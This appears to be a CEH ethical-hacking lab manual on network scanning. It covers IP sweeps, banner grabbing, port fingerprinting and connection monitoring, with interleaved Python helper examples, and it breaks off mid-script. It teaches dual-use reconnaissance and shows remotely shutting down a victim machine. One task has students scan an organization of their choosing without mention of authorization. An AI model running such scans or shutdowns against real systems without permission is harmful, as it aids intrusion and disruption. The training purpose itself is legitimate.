CEH Lab Manual
Scanning Networks
Module 03
Module 03 - Scanning Networks
Scanning a Target Network
Scanning a network refers to a set of procedures for identifying hosts, ports, and services running in a network.
Lab Scenario
Vulnerability scanning determines the possibility of network security attacks. It evaluates the organization's systems and network for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment. You need to conduct penetration testing, list the threats and vulnerabilities found in an organization's network, and perform port scanning, network scanning, and vulnerability scanning to identify IP addresses/hostnames, live hosts, and vulnerabilities.
Lab Objectives
The objective of this lab is to help students in conducting network scanning, analyzing the network vulnerabilities, and maintaining a secure network.
You need to perform a network scan to:
■ Check live systems and open ports
■ Perform banner grabbing and OS fingerprinting
■ Identify network vulnerabilities
■ Draw network diagrams of vulnerable hosts
Lab Environment
In the lab, you need:
■ A computer running Windows Server 2012, Windows Server 2008, Windows 8 or Windows 7 with Internet access
■ A web browser
■ Administrative privileges to run tools and perform scans
Lab Duration
Time: 50 Minutes
Overview of Scanning Networks
Building on what we learned from our information gathering and threat modeling, we can now begin to actively query our victims for vulnerabilities that may lead to a compromise. We have narrowed down our attack surface considerably since we first began the penetration test with everything potentially in scope.
ICON KEY
Valuable information
Test your knowledge
Web exercise
Workbook review
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 85
Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. In fact, even a seemingly harmless misconfiguration can be the turning point in a penetration test that gives up the keys to the kingdom.
For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards using more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then the risk associated with the anonymous read option is minimal. On the other hand, if you are able to read the entire file system using the anonymous FTP account, or, possibly even worse, someone has mistakenly left the customer's trade secrets in the FTP directory that is readable to the anonymous user, this configuration is a critical issue.
Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of them. As we will see in this module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment.
In this module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools.
Lab Tasks
Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.
Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using Advanced IP Scanner
■ Banner Grabbing to Determine a Remote Target System Using ID Serve
■ Fingerprint Open Ports for Running Applications Using the Amap Tool
■ Monitor TCP/IP Connections Using the CurrPorts Tool
■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012
■ Explore and Audit a Network Using Nmap
■ Scanning a Network Using the NetScanTools Pro
■ Drawing Network Diagrams Using LANSurveyor
■ Mapping a Network Using the Friendly Pinger
■ Scanning a Network Using the Nessus Tool
■ Auditing Scanning by Using Global Network Inventory
■ Anonymous Browsing Using ProxySwitcher
TASK 1: Overview
Ensure you have ready a copy of the additional readings handed out for this lab.
■ Daisy Chaining Using Proxy Workbench
■ HTTP Tunneling Using HTTPort
■ Basic Network Troubleshooting Using the MegaPing
■ Detect, Delete and Block Google Cookies Using G-Zapper
■ Scanning the Network Using the Colasoft Packet Builder
■ Scanning Devices in a Network Using The Dude
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Scanning System and Network Resources Using Advanced IP Scanner
Advanced IP Scanner is a free network scanner that gives you various types of information regarding local network computers.
Lab Scenario
In this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities.
Lab Objectives
The objective of this lab is to help students perform a local network scan and discover all the resources on the network.
You need to:
■ Perform a system and network scan
■ Enumerate user accounts
■ Execute remote penetration
■ Gather information about local network computers
Lab Environment
In the lab, you need:
■ Advanced IP Scanner located at Z:\CEHv8 Module 03 Scanning Networks\Scanning Tools\Advanced IP Scanner
■ You can also download the latest version of Advanced IP Scanner from the link http://www.advanced-ip-scanner.com
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows 8 as the attacker (host machine)
■ Another computer running Windows Server 2008 as the victim (virtual machine)
■ A web browser with Internet access
■ Double-click ipscan20.msi and follow the wizard-driven installation steps to install Advanced IP Scanner
■ Administrative privileges to run this tool
Lab Duration
Time: 20 Minutes
Overview of Network Scanning
Network scanning is performed to collect information about live systems, open ports, and network vulnerabilities. The gathered information helps in determining threats and vulnerabilities in a network and in finding out whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources.
Lab Tasks
1. Go to Start by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 1.1: Windows 8 - Desktop view
2. Click Advanced IP Scanner from the Start menu in the attacker machine (Windows 8).
Advanced IP Scanner works on Windows Server 2003/Server 2008 and on Windows 7 (32 bit, 64 bit).
TASK 1: Launching Advanced IP Scanner
[Figure: Windows 8 Start screen showing the Advanced IP Scanner tile among the installed apps]
FIGURE 1.2: Windows 8 - Apps
3. The Advanced IP Scanner main window appears.
FIGURE 1.3: The Advanced IP Scanner main window
4. Now launch the Windows Server 2008 virtual machine (victim's machine).
With Advanced IP Scanner, you can scan hundreds of IP addresses simultaneously.
You can wake any machine remotely with Advanced IP Scanner, if the Wake-on-LAN feature is supported by your network card.
FIGURE 1.4: The victim machine, Windows Server 2008
5. Now, switch back to the attacker machine (Windows 8) and enter an IP address range in the Select range field.
6. Click the Scan button to start the scan.
7. Advanced IP Scanner scans all the IP addresses within the range and displays the scan results after completion.
You have to guess a range of IP addresses for the victim machine.
Radmin 2.x and 3.x integration enables you to connect (if Radmin is installed) to remote computers with just one click.
The status of the scan is shown at the bottom left side of the window.
[Figure: Advanced IP Scanner results for the range 10.0.0.1-10.0.0.10, with Status, Name, IP, Manufacturer and MAC address columns; the status bar reads "5 alive, 0 dead, 5 unknown"]
FIGURE 1.6: The Advanced IP Scanner main window after scanning
8. You can see in the above figure that Advanced IP Scanner has detected the victim machine's IP address and displays the status as alive.
9. Right-click any of the detected IP addresses. It will list Wake-On-LAN, Shut down, and Abort shut down.
[Figure: right-click context menu on a detected host in Advanced IP Scanner (Add to Favorites, Rescan selected, Save selected, Wake-On-LAN, Shut down, Abort shut down, Radmin, Explore, Copy); the status bar reads "5 alive, 0 dead, 5 unknown"]
FIGURE 1.7: The Advanced IP Scanner main window with Alive Host list
10. The list displays properties of the detected computer, such as IP address, Name, MAC, and NetBIOS information.
11. You can forcefully Shutdown, Reboot, and Abort Shutdown the selected victim machine/IP address.
Saving and loading lists of computers enables you to perform operations with a specific list of computers. Just save a list of the machines you need and Advanced IP Scanner loads it at startup automatically.
Group Operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
TASK 2: Extract Victim's IP Address Info
Wake-on-LAN: You can wake any machine remotely with Advanced IP Scanner, if the Wake-on-LAN feature is supported by your network card.
[Figure: Advanced IP Scanner Shutdown options dialog (Use Windows authentication, User name, Password, Timeout (sec): 60, Message, Forced shutdown, Reboot) over the results window for 10.0.0.1-10.0.0.10]
Winfingerprint input options: IP Range (Netmask and Inverted Netmask supported), IP List, Single Host, Neighborhood.
FIGURE 1.8: The Advanced IP Scanner Computer properties window
12. Now you have the IP address, Name, and other details of the victim machine.
13. You can also try Angry IP Scanner, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner. It also scans the network for machines and ports.
Lab Analysis
Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.
Tool/Utility          Information Collected/Objectives Achieved
Advanced IP Scanner   Scan information:
                      ■ IP address
                      ■ System name
                      ■ MAC address
                      ■ NetBIOS information
                      ■ Manufacturer
                      ■ System status
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine and evaluate the IP addresses and range of IP addresses.
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Banner Grabbing to Determine a Remote Target System Using ID Serve
ID Serve is used to identify the make, model, and version of any website's server software.
Lab Scenario
In the previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflow, integer overflow, SQL injection, and web application flaws on a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them, break into the network, and cause server damage.
Therefore, it is extremely important for penetration testers to be familiar with banner grabbing techniques, in order to monitor servers and ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine the role of servers within a network. In this lab, you will learn the banner grabbing technique to determine a remote target system using ID Serve.
Lab Objectives
The objective of this lab is to help students learn to banner grab a website and discover the applications running on that website.
In this lab you will learn to:
■ Identify the domain IP address
■ Identify the domain information
Lab Environment
To perform the lab you need:
■ ID Serve is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve
■ You can also download the latest version of ID Serve from the link http://www.grc.com/id/idserve.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Double-click idserve to run ID Serve
■ Administrative privileges to run the ID Serve tool
■ Run this tool on Windows Server 2012
Lab Duration
Time: 5 Minutes
Overview of ID Serve
ID Serve can connect to any server port on any domain or IP address, then pull and display the server's greeting message, if any, often identifying the server's make, model, and version, whether it's for FTP, SMTP, POP, NEWS, or anything else.
Lab Tasks
1. Double-click idserve located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve.
2. In the main window of ID Serve shown in the following figure, select the Server Query tab.
TASK 1: Identify website server information
[Figure: ID Serve main window (Internet Server Identification Utility v1.02, Personal Security Freeware by Steve Gibson, Gibson Research Corp) with the Background, Server Query and Q&A/Help tabs, the "Enter or copy/paste an Internet server URL or IP address here" field, the Query The Server button and the "The server identified itself as" box]
If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP.
FIGURE 2.1: Main window of ID Serve
3. Enter the IP address or URL in the "Enter or copy/paste an Internet server URL or IP address here" field.
[Figure: ID Serve Server Query tab with www.certifiedhacker.com entered in the URL/IP field, before the query is run]
ID Serve can accept the URL or IP as a command-line parameter.
FIGURE 2.2: Entering the URL for query
4. Click Query The Server; it shows the processed server query information.
[Figure: ID Serve after the query of www.certifiedhacker.com. The "Server query processing" box reads:
Initiating server query
Looking up IP address for domain www.certifiedhacker.com
The IP address for the domain is 202.75.54.101
Connecting to the server on standard HTTP port: 80
Connected! Requesting the server's default page
The server identified itself as: Microsoft-IIS/6.0]
ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.
FIGURE 2.3: Server processed information
Lab Analysis
Document all the IP addresses, their running applications, and the protocols you discovered during the lab.
Tool/Utility   Information Collected/Objectives Achieved
ID Serve       IP address: 202.75.54.101
               Server connection: standard HTTP port 80
               Response headers returned from server:
               ■ HTTP/1.1 200
               ■ Server: Microsoft-IIS/6.0
               ■ X-Powered-By: PHP/4.4.8
               ■ Transfer-Encoding: chunked
               ■ Content-Type: text/html
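The headers in the table above are exactly what a banner grabber reads. The following Python is an added example, not part of the lab or of ID Serve, that parses a raw HTTP response into its status line and headers, pulls the make/model/version out of the Server and X-Powered-By headers, and falls back to the first greeting line for non-web protocols (FTP, SMTP, POP, NNTP). The sample responses are constructed, and the product-token regexes and the protocol hints are assumptions of the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed responses (not captured from a live server): the HTTP one is
# modelled on the headers listed in this lab's analysis table, the second
# is a typical FTP greeting with a made-up host name.
SAMPLE_HTTP = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"X-Powered-By: PHP/4.4.8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>default page</body></html>"
)
SAMPLE_FTP = b"220 ftp.example.test FTP server (vsftpd 2.0.5) ready.\r\n"

# "Microsoft-IIS/6.0", "Apache/2.2.3", "nginx" -> (product, version or None)
_PRODUCT_RE = re.compile(r"([A-Za-z][\w.\-]*)(?:/([\w.\-]+))?")
# "vsftpd 2.0.5", "OpenSSH_5.3" style tokens inside a greeting line
_GREETING_RE = re.compile(r"([A-Za-z][\w.\-]*?)[/ _]v?(\d+(?:\.\d+)+)")
# Assumed mapping from how a greeting line starts to the protocol family.
_GREETING_HINTS = {"+OK": "pop3", "* OK": "imap", "220": "ftp/smtp", "200": "nntp"}


def parse_http_headers(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Return (status_line, headers) for a raw HTTP response.

    Header names are lowercased, repeated headers are joined with ", ",
    bare LF line endings are tolerated, and lines without a colon are
    skipped rather than aborting the parse.
    """
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head = raw.split(sep, 1)[0].decode("iso-8859-1")
    lines = head.replace("\r\n", "\n").split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            continue
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return lines[0].strip(), headers


def split_products(value: str) -> List[Tuple[str, Optional[str]]]:
    """'Apache/2.2.3 (CentOS) PHP/5.1.6' -> [('Apache', '2.2.3'), ('PHP', '5.1.6')].

    Parenthesised comments (OS, build flags) are dropped; a product with
    no version keeps None so callers can tell 'nginx' from 'nginx/1.2'.
    """
    without_comments = re.sub(r"\([^)]*\)", " ", value)
    return [(m.group(1), m.group(2)) for m in _PRODUCT_RE.finditer(without_comments)]


def identify_server(raw: bytes) -> Dict[str, object]:
    """Reproduce ID Serve's 'the server identified itself as' line.

    HTTP replies are identified from the Server header (plus X-Powered-By
    when present). Anything else is treated as a greeting-line protocol
    such as FTP, SMTP, POP or NNTP: the banner is the first line and the
    protocol family is guessed from how that line starts.
    """
    if raw.startswith(b"HTTP/"):
        status, headers = parse_http_headers(raw)
        server = headers.get("server")
        products = split_products(server) if server else []
        if "x-powered-by" in headers:
            products += split_products(headers["x-powered-by"])
        return {
            "protocol": "http",
            "status": status,
            "banner": server if server is not None else "(no Server header)",
            "products": products,
        }
    first = raw.split(b"\n", 1)[0].rstrip(b"\r").decode("iso-8859-1", "replace")
    hint = next((p for k, p in _GREETING_HINTS.items() if first.startswith(k)), "unknown")
    return {
        "protocol": hint,
        "status": first[:3] if first[:3].isdigit() else "",
        "banner": first,
        "products": [(m.group(1), m.group(2)) for m in _GREETING_RE.finditer(first)],
    }
```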
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine which protocols ID Serve handles.
2. Check if ID Serve supports https (SSL) connections.
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Fingerprinting Open Ports Using the Amap Tool
Amap determines the applications running on each open port.
Lab Scenario
Computers communicate with each other by knowing the IP address in use, and ports determine which program receives the data. A complete data transfer always contains the IP address plus the port number required. In the previous lab we found out that the server connection is using the standard HTTP port 80. If an attacker finds this information, he or she will be able to use the open ports for attacking the machine.
In this lab, you will learn to use the Amap tool to perform port scanning and know exactly what applications are running on each port found open.
Lab Objectives
The objective of this lab is to help students learn to fingerprint open ports and discover the applications running on these open ports.
In this lab, you will learn to:
■ Identify the application protocols running on open port 80
■ Detect application protocols
Lab Environment
To perform the lab you need:
■ Amap is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
■ You can also download the latest version of Amap from the link http://www.thc.org/thc-amap
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running web services enabled for port 80
■ Administrative privileges to run the Amap tool
■ Run this tool on Windows Server 2012
Lab Duration
Time: 5 Minutes
Overview of Fingerprinting
Fingerprinting is used to discover the applications running on each open port found on the network. Fingerprinting is achieved by sending trigger packets and looking up the responses in a list of response strings.
Lab Tasks
1. Open the command prompt and navigate to the Amap directory. In this lab the Amap directory is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
2. Type amap www.certifiedhacker.com 80, and press Enter.
Administrator: Command Prompt
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>amap www.certifiedhacker.com 80
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:20:42 - MAPPING mode

Unidentified ports: 202.75.54.101:80/tcp (total 1).

amap v5.2 finished at 2012-08-28 12:20:53

D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>
FIGURE 3.1: Amap with host name www.certifiedhacker.com and port 80
3. You can see the specific application protocols running on the entered host name and port 80.
4. Use the IP address to check the applications running on a particular port.
5. In the command prompt, type the IP address of your local Windows Server 2008 (virtual machine): amap 10.0.0.4 75-81 (local Windows Server 2008), and press Enter (the IP address will be different in your network).
6. Try scanning different websites using different port ranges, for example amap www.certifiedhacker.com 1-200.
TASK 1: Identify Application Protocols Running on Port 80
Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
For Amap options, type amap -help.
FIGURE 3.2: Amap with IP address and port range 75-81
Lab Analysis
Document all the IP addresses, open ports and their running applications, and the protocols you discovered during the lab.
Tool/Utility   Information Collected/Objectives Achieved
Amap           Identified open port: 80
               Web servers: http-apache-2, http-iis, webmin
               Unidentified ports: 10.0.0.4:75/tcp, 10.0.0.4:76/tcp, 10.0.0.4:77/tcp, 10.0.0.4:78/tcp, 10.0.0.4:79/tcp, 10.0.0.4:81/tcp
Terminal output shown in Figure 3.2 (amap 10.0.0.4 75-81):
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>amap 10.0.0.4 75-81
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode

Protocol on 10.0.0.4:80/tcp matches http
Protocol on 10.0.0.4:80/tcp matches http-apache-2
Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
Protocol on 10.0.0.4:80/tcp matches http-iis
Protocol on 10.0.0.4:80/tcp matches webmin

Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).

amap v5.2 finished at 2012-08-28 12:27:54

D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>
Compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux and PalmOS
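To make the trigger-and-response-lookup idea behind Amap concrete, here is an added Python example (not Amap's own code): a small constructed signature table, a matcher that returns every signature a response satisfies, and a driver that reports in Amap's output style. The probe function is a stand-in for the network; the signature regexes, the fake host and its replies are all constructed for the example. It shows why one port can match several names, as 10.0.0.4:80 did in the output above.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed signature table in the spirit of Amap's trigger/response
# definitions. The regexes are illustrative and deliberately loose; they
# are not copied from Amap's appdefs files.
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("http",          re.compile(rb"^HTTP/1\.[01] \d{3}")),
    ("http-apache-2", re.compile(rb"\r\nServer: Apache/2", re.I)),
    ("http-iis",      re.compile(rb"\r\nServer: Microsoft-IIS", re.I)),
    ("webmin",        re.compile(rb"\r\nServer: MiniServ", re.I)),
    ("ssh",           re.compile(rb"^SSH-\d\.\d-")),
    ("ftp",           re.compile(rb"^220[ -].*ftp", re.I | re.S)),
    ("smtp",          re.compile(rb"^220[ -].*e?smtp", re.I | re.S)),
]

# Trigger packets sent to each port. An empty trigger means "connect and
# wait for the server's greeting", which is how FTP, SMTP and SSH answer.
TRIGGERS: Dict[str, bytes] = {
    "http-get": b"GET / HTTP/1.0\r\n\r\n",
    "banner": b"",
}

# probe(port, trigger) -> response bytes (b"" if the server stayed silent),
# or None when the TCP connection could not be made at all.
ProbeFn = Callable[[int, bytes], Optional[bytes]]


def match_response(response: bytes) -> List[str]:
    """Names of every signature whose regex matches the response.

    Several signatures can match one response: an IIS reply satisfies both
    'http' and 'http-iis', which is why Amap printed several 'matches'
    lines for 10.0.0.4:80 in this lab.
    """
    return [name for name, rx in SIGNATURES if rx.search(response)]


def fingerprint_host(host: str, ports: List[int], probe: ProbeFn) -> Tuple[List[str], Dict[int, List[str]]]:
    """Send every trigger to every port and report in Amap's output style.

    Returns (report_lines, {port: [matched names]}). Ports that could not
    be connected to, or that answered nothing recognisable, are listed as
    unidentified at the end, as Amap does.
    """
    lines: List[str] = []
    found: Dict[int, List[str]] = {}
    for port in ports:
        reachable = False
        matches: List[str] = []
        for trigger in TRIGGERS.values():
            response = probe(port, trigger)
            if response is None:
                continue
            reachable = True
            for name in match_response(response):
                if name not in matches:      # same name from two triggers
                    matches.append(name)
        if not reachable:
            lines.append(f"Warning: Could not connect (unreachable) to {host}:{port}/tcp, disabling port")
            continue
        for name in matches:
            lines.append(f"Protocol on {host}:{port}/tcp matches {name}")
        if matches:
            found[port] = matches
    unidentified = [p for p in ports if p not in found]
    lines.append("Unidentified ports: " + " ".join(f"{host}:{p}/tcp" for p in unidentified)
                 + f" (total {len(unidentified)}).")
    return lines, found


# Constructed stand-in for the network: the fake host answers on 80 (IIS,
# only to a GET) and on 22 (SSH greeting); every other port is closed.
IIS_REPLY = (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\n"
             b"X-Powered-By: PHP/4.4.8\r\nContent-Type: text/html\r\n\r\n")
SSH_BANNER = b"SSH-2.0-OpenSSH_5.3\r\n"


def fake_probe(port: int, trigger: bytes) -> Optional[bytes]:
    if port == 80:
        return IIS_REPLY if trigger.startswith(b"GET ") else b""  # silent until asked
    if port == 22:
        return SSH_BANNER          # SSH speaks first, whatever was sent
    return None                    # connection refused / unreachable


if __name__ == "__main__":
    report, _ = fingerprint_host("10.0.0.4", [22] + list(range(75, 82)), fake_probe)
    print("\n".join(report))
```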
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Execute the Amap command for a host name with a port number other than 80.
2. Analyze how the Amap utility discovers the applications running on different machines.
3. Use various Amap options and analyze the results.
Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs
Monitoring TCP/IP Connections Using the CurrPorts Tool
CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer.
Lab Scenario
In the previous lab you learned how to check for open ports using the Amap tool. As an ethical hacker and penetration tester, you must be able to block such attacks by using appropriate firewalls or by disabling unnecessary services running on the computer.
You already know that the Internet uses a software protocol named TCP/IP to format and transfer data. An attacker can monitor ongoing TCP connections and obtain all the information in the IP and TCP headers and in the packet payloads, with which he or she can hijack the connection. As the attacker has all the information on the network, he or she can create false packets in the TCP connection.
As a network administrator, your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the established IP addresses of the server using the CurrPorts tool.
Lab Objectives
The objective of this lab is to help students determine and list all the TCP/IP and UDP ports of a local computer.
In this lab, you need to:
■ Scan the system for currently opened TCP/IP and UDP ports
■ Gather information on the ports and processes that are opened
■ List all the IP addresses that currently have established connections
■ Close unwanted TCP connections and kill the process that opened the ports
Lab Environment
To perform the lab, you need:
■ CurrPorts located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\CurrPorts
■ You can also download the latest version of CurrPorts from the link http://www.nirsoft.net/utils/cports.html
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click cports.exe to run this tool
■ Administrator privileges to run the CurrPorts tool
Lab Duration
Time: 10 Minutes
You can download the CurrPorts tool from http://www.nirsoft.net.
Overview of Monitoring TCP/IP
Monitoring TCP/IP ports checks whether multiple IP connections are established. Scanning TCP/IP ports gets information on all the opened TCP and UDP ports and also displays all established IP addresses on the server.
Lab Tasks
The CurrPorts utility is a standalone executable and doesn't require any installation process or additional DLLs (Dynamic Link Libraries). Extract CurrPorts to the desired location and double-click cports.exe to launch it.
1. Launch CurrPorts. It automatically displays the process name, ports, local and remote IP addresses, and their states.
TASK 1: Discover TCP/IP Connection
FIGURE 4.1: The CurrPorts main window with all processes, ports, and IP addresses
2. CurrPorts lists all the processes and their IDs, protocols used, local and remote IP addresses, local and remote ports, and remote host names.
3. To view all the reports as an HTML page, click View → HTML Reports - All Items.
FIGURE 4.2: CurrPorts with HTML Report - All Items
4. The HTML report automatically opens in the default browser.
FIGURE 4.3: The web browser displaying CurrPorts Report - All Items
5. To save the generated CurrPorts report from the web browser, click File → Save Page As... (Ctrl+S).
The CurrPorts utility is a standalone executable, which doesn't require any installation process or additional DLLs.
In the bottom left of the CurrPorts window, the status of total ports and remote connections is displayed.
To check the countries of the remote IP addresses, you have to download the latest IP to Country file. You have to put the IpToCountry.csv file in the same folder as cports.exe.
FIGURE 4.4: The web browser used to save CurrPorts Report - All Items
6. To view only the selected items as an HTML page, select the items and click View → HTML Reports - Selected Items.
FIGURE 4.5: CurrPorts with HTML Report - Selected Items
7. The selected report automatically opens in the default browser.
CurrPorts allows you to save all changes (added and removed connections) to a log file. To start writing to the log file, check the 'Log Changes' option under the File menu.
By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log filename by setting the LogFilename entry in the cports.cfg file.
Be aware: the log file is updated only when you refresh the ports list manually, or when the Auto Refresh option is turned on.
You can also right-click on the web page and save the report.
In the filters dialog box, you can add one or more filter strings (separated by spaces, semicolons, or CRLF).
FIGURE 4.6: The web browser displaying CurrPorts HTML Report - Selected Items
8. To save the generated CurrPorts report from the web browser, click File → Save Page As... (Ctrl+S).
FIGURE 4.7: The web browser used to save CurrPorts HTML Report - Selected Items
9. To view the properties of a port, select the port and click File → Properties.
The syntax for a filter string is: [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IP Range | Ports Range].
Command-line option: /stext <Filename> saves the list of all opened TCP/UDP ports into a regular text file.
Command-line option: /stab <Filename> saves the list of all opened TCP/UDP ports into a tab-delimited text file.
FIGURE 4.8: CurrPorts showing the Properties option for a selected port
10. The Properties window appears and displays all the properties of the selected port.
11. Click OK to close the Properties window.
The Properties window shows the following fields: Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name, State, Process Path, Product Name, File Description, File Version, Company, Process Created On, User Name, Process Services, Process Attributes, Added On, Module Filename, Remote IP Country, and Window Title.
Command-line option: /shtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (horizontal layout).
FIGURE 4.9: The CurrPorts Properties window for the selected port
12. To close a TCP connection you think is suspicious, select the process and click File → Close Selected TCP Connections (or press Ctrl+T).
FIGURE 4.10: The CurrPorts Close Selected TCP Connections option
13. To kill the processes of a port, select the port and click File → Kill Processes Of Selected Ports.
FIGURE 4.11: The CurrPorts Kill Processes Of Selected Ports option
14. To exit from the CurrPorts utility, click File → Exit. The CurrPorts window closes.
TASK 2: Close TCP Connection
TASK 3: Kill Process
Command-line option: /sverhtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (vertical layout).
FIGURE 4.12: The CurrPorts Exit option
Lab Analysis
Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.
Tool/Utility: CurrPorts
Information Collected/Objectives Achieved:
■ Profile Details: Network scan for open ports
■ Scanned Report: Process Name, Process ID, Protocol, Local Port, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name
On the command line, the syntax of the /close command is: /close <Local Address> <Local Port> <Remote Address> <Remote Port>
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze the results from CurrPorts by creating a filter string that displays only packets with remote TCP port 80 and UDP port 53, and running it.
2. Analyze and evaluate the output results by creating a filter that displays only the opened ports in the Firefox browser.
3. Determine the use of each of the following options that are available under the Options menu of CurrPorts:
a. Display Established
b. Mark Ports Of Unidentified Applications
c. Display Items Without Remote Address
d. Display Items With Unknown State
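The filter syntax quoted in the sidebar above ([include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IP Range | Ports Range]) and the two filter questions can be worked through offline with the following Python script. It is an added example and not NirSoft's code: it re-implements the filter matching over rows shaped like a CurrPorts /stab export. The sample export, the svchost.exe UDP row, the reading of the process form (last field taken as the executable name) and the include/exclude precedence (a row is shown only if it matches at least one include filter, when any exist, and no exclude filter) are all assumptions of this example.

```python
"""CurrPorts-style filter strings applied to a tab-delimited port list.

Added example, not NirSoft's code. Re-implements the filter syntax quoted
in the lab over rows shaped like a CurrPorts /stab export. Assumptions:
the sample export is constructed; for the 'process' form the last field
is the executable name; a row is shown only if it matches at least one
include filter (when any exist) and no exclude filter.
"""
import ipaddress
import re
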